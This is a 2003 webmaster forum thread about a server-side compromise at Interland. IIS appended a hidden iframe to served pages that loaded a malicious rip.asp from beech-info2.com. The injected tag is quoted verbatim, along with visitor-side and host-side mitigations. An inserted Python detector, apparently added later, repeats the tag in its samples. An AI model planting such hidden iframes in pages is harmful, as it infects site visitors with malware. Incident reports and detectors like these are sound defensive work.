
My hosting company's server infected with Trojan

Any HELP appreciated!

     
11:15 am on Aug 29, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


Hi Guys,

My company's site is on an Interland Windows server. This afternoon 8/28/03 something bizarre began to happen...

Upon loading our site, the URL in the status bar read something like "Opening Page"... www.widgit.com/_vti_con/rip.asp

That is NOT our URL. The status bar should have OUR URL. I called Interland about 6:00pm 8/28/03 and they said they were working to remove the problem.

I learned that there is a Trojan which adds some script to all the HTML files on the WebServer. Interland said they experienced this several months ago, and now, in the last 24 hours a new version of the Trojan has struck back again.

One of our computers at the office started popping Desktop Icons on the Desktop... Its name was malware334.exe

But the real way of seeing if your site is affected is to check the bottom of your HTML page. If infected, the trojan adds an <iframe> tag with an HREF to the beech-info2.com site.

I could say more, but I'm exhausted right now from lack of sleep.

So I just wanted to alert anyone who either SURFS on sites hosted by Interland -OR- manages sites hosted by Interland.

If you surf to an infected site, your computer can become infected, depending on your OS and browser versions.

And if anyone can shed some more light on this matter, I'd be very grateful.

Sincerely,
Gene

11:39 am on Aug 29, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


I forgot to add...

Interland says they have deleted the embedded scripts in the infected HTML files, as well as whatever else needed to be done.

As a precaution, I've taken my site down until I can be sure this problem is truly resolved.

The site does appear to be clean now, however.

I'm wondering if I should just wipe out everything on my virtual server with them and upload a fresh set of files.

~Gene

6:39 pm on Aug 29, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Nov 15, 2001
posts:1741
votes: 41


There does not seem much point in spending too much effort uploading new versions of all files if the infection is still rife on their servers; they may just get reinfected.

I would try to get regular updates from them as to when they will be clean .. then go in and check the damage and replace your sites at that time ... if you can redirect users to a holding page for a day or so .. how long can it take them to sort themselves out?

8:34 am on Aug 31, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


After learning a little more about this problem, I fired off a lengthy and detailed email to Interland. (My question to Webmaster World members is, Am I handling this situation correctly?)

email deleted

What else should I do Webmaster World members?

Interestingly, I found a forum B.B. where an earlier version of this trojan was discussed in May 2003, which ALSO affected Interland servers...

It only takes a minute to read, if you're interested.

~Gene

[edited by: Brett_Tabke at 9:35 am (utc) on Sep. 4, 2003]

8:51 am on Aug 31, 2003 (gmt 0)

Senior Member

joined:Nov 20, 2000
posts:1336
votes: 0


>> What else should I do Webmaster World members? <<

If it's an important site that you depend upon for income, always have control of the domain name and access to a backup host, perhaps a multi-host (even a cheapie at a handful of $ per month).

That way, as soon as you hit a problem you can re-point.

Worst scenario then is maybe 24-48 hours. Not wonderful, but a lot better than sitting there a day later with maybe the host still not having sorted the problem. You can always point back if it's sorted quickly... but you can't recapture time if it isn't.

3:10 pm on Aug 31, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Sept 21, 1999
posts:2141
votes: 0


My suggestion is to seek new hosting promptly and consider moving to *nix based hosting. I don't want to start another M$ vs *nix "holy war" but there are substantially fewer exploits available to "script kiddies" for *nix based systems. Life offers plenty of problems; my choice is to avoid as many as I can so that I can focus all my energies on those that can't be avoided.
4:15 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:5
votes: 0


Another Interlander hit...

Looks like what it's doing is adding an <IFRAME> to the page that requests a page off beech-info2.com called "rip.asp". Apparently some kind of Javascript exploit.

Two quick notes:

1) people who surf the web on WinNT-based systems (including Win NT, Win 2K, and Win XP) should probably add a line to their hosts file pointing www.beech-info2.com to 127.0.0.1, so they don't access this rip.asp file.

2) I FTP'd to the webserver, and it looks like the files aren't being infected - it's IIS that's appending this <IFRAME> tag just before serving the file. The files on my server don't have said <IFRAME> in the code. Just a heads up to anybody running an IIS webserver and looking for this infection. That means re-uploading your files won't help, either, since the files are untouched.

5:29 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:2
votes: 0


My Interland hosted sites are experiencing the same thing...can anyone think of any fix in the short term? I tried to use a style sheet to redefine the iframe tag with

display: none;
visibility: hidden;

Unfortunately, this doesn't appear to do the trick.

I hope this is fixed soon by Interland, and hope to see some kind of status report from them soon.

Nate

5:53 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:5
votes: 0


Mmm, the only thing I can think of is to add a little javascript to do document.frames[0].src = ""; or something like that, but you'd have to put it on every page (include files, framesets, everything) and if your site uses frames, you'd need to find the right frame... Bit of a pain.

You could also add an HTML open comment to the end of every page, that might work. Just <!-- at the end of every page, since this IFRAME is being appended to the end of the file... So the browser will think the IFRAME is a comment and not parse it.

Other than that, add the 127.0.0.1 www.beech-info2.com to your hosts file to keep your *local* machine from being infected. Looks like this IIS infection is just to open up distribution of *another* virus.

Yeesh.

6:05 pm on Sept 2, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:2
votes: 0


The comment idea is an interesting one...fortunately, the problem seems to have been resolved for the time being. I hope others are finding this is true as well.

Nate

2:39 am on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


Also hosted on Interland (shared Windows 2000 environ)

My shared server and domain became infected today (9/2/03). The infection seems to be spreading (search the string in Google and it is now up to 5 pages of sites w/infection).

Interland claims to know of the infection and says they have written a job script to remove references and fix the IIS side of things.

It seems, though, that they don't have a good handle on this. The first post in this thread goes back to 8/28 and I was infected at about 4pm Eastern today.

The reseller support tech I worked with knew of the issue, but had no info that would assist me.

That is the latest update from shared-server hosting hell.

Rich

2:49 pm on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:5
votes: 0


Another update:

I just spoke to Interland again - since they hadn't completely fixed the problem. Files with a *.js extension (javascript source files) were still being tagged with the IFRAME. The good news, of course, is that HTML in a javascript source won't be parsed. The bad news is that the *.js files stop working.

Turns out this guy is *actively* hacking Interland. They supposedly have a Microsoft dude flown in, and they're doing a little mano-a-mano. Who knows? The hope is to be "permanently patched in 12 to 24 hours." Ugh.

"Previously unknown IIS exploit," where have I heard those words before...?

R_Gidley

3:52 pm on Sept 3, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


Lots of good info here.

Thought I'd add a symptom for those (like me) who get baffled by things disappearing from their web sites.

If you're running the AllWebMenus menu script (which uses JavaScript for the menus), this hack will disable the menus. The <iframe> gets added to the last line of the main JavaScript file, which generates an error and prevents the menu from appearing.

This is how we first realized something was wrong.

Apparently, the <iframe> line is added dynamically--if you look at the JavaScript source on the web site, it's not there, but when you load it in a browser, it is.

As of 15:50 UTC on Sept 3, my client's web site is still infected. I have strongly recommended to them that they switch to a different ISP (right now, we're redirecting their web site to mine, which doesn't use Interland).

Robert Gidley

[edited by: DaveAtIFG at 3:59 pm (utc) on Sep. 3, 2003]

4:07 pm on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


I found out the same way, as I'm using Sothink DHTML menus. Java using FrontPage still works, but Javascript is not working. It throws an IE error, which prevents it from loading.

criminalbeta

11:04 pm on Sept 3, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


All,

The iframe footer is a dynamic footer that has been added to the IIS 5 configuration of the server, aka "Global Footer". Low end hosts use this feature in IIS 5 to add advertisements and other such things to a customer's page. This is not an infection of the web server itself. The source file that the footer is pointing to [wvw.beech-info2.com...] is the source of the trojan virus. NOTE: 'wVw'.beech-info2.com. In order to pull off such a hack you would have to have a script located in Interland's network that ran at a regular interval, along with some other hacking tools to gain access to the server's IIS configuration. There are a lot of legitimate scripts that do this. The only malicious thing about this is the source file rip.asp.

The domain name beech-info2.com is owned by ryan shepherd (ryan_shepherdpp@yahoo.com) but I am sure he is unaware of this situation. If the hacker has half a brain he will have hacked this poor guy's DNS and added an A record to resolve wvw to a different IP than the one that is listed for beech-info2.com. Or the domain was bought under false information; either way it is almost completely untraceable. The bad thing is that all hosts are vulnerable to this. This hacker just chose Interland to wreak havoc on.

CRiMiNaL BeTa
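The mechanism described in the post above and earlier in the thread (IIS appends the footer at serve time, so files on disk look clean, and .js responses get the same footer and stop parsing) can be checked from the client side. The following Python script is an added example, not code from any poster or from Interland: it inspects a fetched response body rather than the files on the server, treats anything after the closing </html> (or any iframe inside a JavaScript response) as the injected footer, and still flags the iframe when it sits behind an open <!-- since the footer is being served either way. The sample response bodies are constructed to match the symptoms posted in this thread; www.widgit.com is the placeholder site name from the first post.

```python
import re
from urllib.parse import urlparse

# Constructed sample response bodies modelled on the symptoms reported in this
# thread: a hidden iframe appended after </html>, the same footer after an open
# <!-- (the workaround discussed later in the thread), the footer appended to a
# .js file, and a clean page for comparison.
SAMPLE_HTML = (
    "<html><head><title>Widgets</title></head><body><p>Welcome</p></body></html>\r\n"
    "<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 "
    "frameborder=0 marginwidth=0 marginheight=0></iframe>"
)
SAMPLE_HTML_COMMENTED = (
    "<html><body><p>Welcome</p></body></html>\r\n<!--\r\n"
    "<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0></iframe>"
)
SAMPLE_JS = (
    "function showMenu() { return true; }\r\n"
    "<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0></iframe>"
)
CLEAN_HTML = "<html><body><p>Welcome</p></body></html>\r\n"

# Matches an iframe tag and captures its src value, quoted or (as in the thread) unquoted.
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.IGNORECASE)


def iframe_hosts(fragment):
    """Return the lowercase hostnames referenced by iframe src attributes in fragment."""
    hosts = []
    for src in IFRAME_SRC_RE.findall(fragment):
        host = urlparse(src).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def detect_footer_injection(body, content_type, site_host):
    """Inspect a served response body for an appended IIS footer.

    Returns {"injected": bool, "hosts": [...], "trailer": str, "reason": str}.
    HTML: everything after the closing </html> is the trailer; an iframe there
    pointing off-site is flagged even if an open <!-- precedes it.  JavaScript:
    any iframe tag is flagged, because HTML inside a script response means the
    footer was appended and the script will no longer parse in the browser.
    """
    ctype = content_type.lower()
    if ctype.startswith("text/html"):
        end = re.search(r"</html\s*>", body, re.IGNORECASE)
        trailer = body[end.end():] if end else ""
        foreign = [h for h in iframe_hosts(trailer) if h != site_host.lower()]
        if foreign:
            return {"injected": True, "hosts": foreign, "trailer": trailer.strip(),
                    "reason": "iframe to off-site host appended after </html>"}
        return {"injected": False, "hosts": [], "trailer": trailer.strip(), "reason": ""}
    if "javascript" in ctype:
        hosts = iframe_hosts(body)
        if hosts:
            return {"injected": True, "hosts": hosts, "trailer": body,
                    "reason": "iframe tag inside a JavaScript response"}
        return {"injected": False, "hosts": [], "trailer": "", "reason": ""}
    return {"injected": False, "hosts": [], "trailer": "", "reason": "content type not inspected"}
```

To use it on a live site, fetch each page and script with any HTTP client and pass the body, the Content-Type header and your own hostname; a clean site returns an empty trailer for every HTML page.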

11:52 pm on Sept 3, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


URL (IP address) used in iframe attack back in July (7/28/03) is the same one that URL wwww.beech-info2.com points to now.... (note 4 w's)

There's also ww, www, wvw : beech-info2.com... The TLD and WWW point to one place, all others point to different places. I'd like to know there are no other aliases out there waiting!

The attack on July 28th was the above IP, with a URL in the iframe of IP/cgi-bin/inf.htm, which redirected to a file named readme.pl, which triggered a file download like this time. Maybe the hole from May 18, 2003 was never plugged, and not plugged again on July 28th? To think that the attack this time was exactly one month after the one in July.... Also, with the beech-info.com information on the LabMice.net attack (that was the URL in the iframe), and the beech-info2.com URL, seems pretty certain this is the same guy or gal, or more backlash of the same original hack. All three iframe attacks do appear to be from the same person.

12:17 am on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


RE: Interland

By 4pm today (eastern) 14 of my sites at Interland were patched/fixed and have remained free of any issues (for now...)

12:39 am on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


You can find out by looking (in IE6 anyway) at the privacy report for the page. Go to

View --> Privacy Report...

If you see something from *.beech-info* then you are seeing a page with the IIS footer set with the malicious iframe tags.

If you add beech-info2.com to your restricted sites zone, you will see an "Unknown (Mixed)" security zone displayed in your IE status bar. I get a "Your current security settings prevent you from running ActiveX controls on this page. As a result, the page may not display correctly." (thankfully) when I visit an infected page.

I currently have one page still affected, but others appear to be fixed. Reloaded and cleared cache, but still there.

1:22 pm on Sept 4, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


Hello fellow webmasters,

I've been away from the FORUMS for a few days since I started this thread. Going nuts with this thing.

Anyway, on Sept 3, we called Interland's Sales people and requested a switch over to a UNIX server.

Within hours I received an email confirmation & then called back to confirm the switch. Then, a few hours later our Domain Name was pointing to the NEW IP address.

So we are through with the IIS server, and it's UNIX from here on out.

The transition went very smoothly working with their sales people.

I'll be uploading a fresh set of files in the coming day or two.

If you don't need the features of a Windows server, you may want to make the switch. Hopefully, this will work out well.

If you do stick with Windows, keep us posted as to your progress with the Bug.

Best Wishes,
Gene

P.S. the rip.asp file as you probably know contains an object tag pointing to a perl file called inf2.pl
I think I have a copy of what reads inside of it. I'll post the info later. It's kind of interesting. But I'm late for work right now. gotta go.

P.P.S. I have one NEW question about the Nix box. When I used to FTP on win server, the file size was always the same on both "panes" of my WS_FTP program.
But now when I upload a 186 byte file to the Nix box, the remote pane on the Nix server displays the file size as 179 bytes. WHAT'S UP WITH THIS? Thanks for any insights you may have...

~Gene

1:57 pm on Sept 4, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Sept 21, 1999
posts:2141
votes: 0


Good to hear you're making progress Gene! Windoze and *nix store files and display file sizes a little differently; what you describe is perfectly normal. For other *nix questions please start a new thread, we're way off topic after all... ;)
4:41 pm on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


iframe back as of 12 Noon EDT 9/4/03 (on my shared Tru). Has anyone confirmed if adding an open comment tag after </html> in the documents will prevent the iframe from being parsed?
e.g.
...
</HTML>
<!-- stop the iframe

or
...
</HTML>
<% response.end %>

From a webmaster standpoint, it would be nice to help prevent new browsers from being infected.

R_Gidley

4:43 pm on Sept 4, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


Heads up, all.

My client's Interland sites were cleaned up and fine yesterday, but today have been reinfected.

I'm getting tired of this....

Robert Gidley

R_Gidley

4:48 pm on Sept 4, 2003 (gmt 0)

Inactive Member
Account Expired

 
 


Tried the comment thing, but it doesn't seem to work.

Our symptom is that menus are disabled in Internet Explorer. When I look at the source, this is what I see:

</html>
<!--

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

So it *ought* to be commented out, but it's not (the menus are still disabled).

Robert Gidley

5:02 pm on Sept 4, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


Does anyone know if the target URL is still 'virulent' or 'squirming'?

Should jokerDOTcom change all sub-domains off of beech-info2DOTcom to local loopback IP 127.0.0.1? Maybe that way, new people would be prevented from being infected?

10:05 pm on Sept 4, 2003 (gmt 0)

Junior Member from US 

10+ Year Member

joined:July 7, 2001
posts:75
votes: 0


Hi all,

Don't hold me to this, but our experience with this bug suggests that if you're surfing on IE 5.5 sp2 or IE 6.0 with updated service packs, then the bug's ultimate goal of "infecting" your PC won't be realized.

However, if you surf to an infected site on anything less than IE 5.5 sp2, then your PC could be maliciously infested with malware.exe files and DLL files, which can be difficult to search & destroy.

This is how we learned of the issue last week... One of our older PCs had IE 5.0 and that employee's machine was hit with the desktop exe icons that I mentioned in my 1st message.

Of course, it's still disconcerting to have this thing poking its nose into your PC, but I don't think it will do any real damage if you're updated sufficiently. Again, that's just my opinion.

The inf2.pl file that I mentioned this morning seems to contain the script that creates the malware.exe files on the PC's hard drive. We also identified a file named wiroivd that we believe was associated with the bug, but only on IE 5.0 machines.

We do have rip.asp or rip.htm files in the Cache of our XP machines, but they never successfully retrieved the perl file from the beech-info site.

What we HAVE experienced on XP machines with IE 6 is that "sometimes" a surfer will get a "Network Log In" pop up which requests their UserName and password. The "site" and "realm" listed on the pop up does say beech-info2 however.

Hopefully, most folks would be savvy enough to question this sort of behavior on their PC, though I'm sure many would not.

Also, as mnamesir mentioned, this thing seems to be changing its target URL almost daily. We never experienced that, but another Interland customer that I've been in touch with did say that the URL was being modified from the original beech-info2 domain name.

Of course now that we've switched to unix, everything is back to normal. But I do feel for all of you who are dealing with this issue. Please keep us posted as to your progress.

Sincerely,
Gene

6:08 am on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 2, 2003
posts:1
votes: 0


I think Interland must delete or add some key in the Windows Registry using regedit.exe to fix the problem with the footer.
12:52 pm on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:3
votes: 0


Interland called last night (I'm a reseller and have a bunch of accounts with them and told them "get it fixed now or I'm going someplace else") to report that all of my domains were now clean.

They also said that they didn't know what this was two weeks ago and were trying to spot clean it one virtual site at a time.

Once they realized it was server-based and that cleaned sites were being re-infected, they moved to a batch script and isolated the servers. For now, that seems to have done the trick.

My sites are all still clean, although I had to clear my cache just to be sure. One clean site was still showing locally as infected until I cleared.

1:08 pm on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 3, 2003
posts:16
votes: 0


Like you, rpalarea, I do not see the iframe text being added this AM, as of the time of this post.
4:45 pm on Sept 5, 2003 (gmt 0)

New User

10+ Year Member

joined:Sept 5, 2003
posts:2
votes: 0


Thanks for that last note. Empty the cache and you'll see no more Error line. By the way, if you're viewing using a Mac, the .exe virus won't be a problem, right?
Thanks
12:20 am on Sept 6, 2003 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Sept 21, 1999
posts:2141
votes: 0


Wired News has posted a story about this Interland problem at [wired.com...]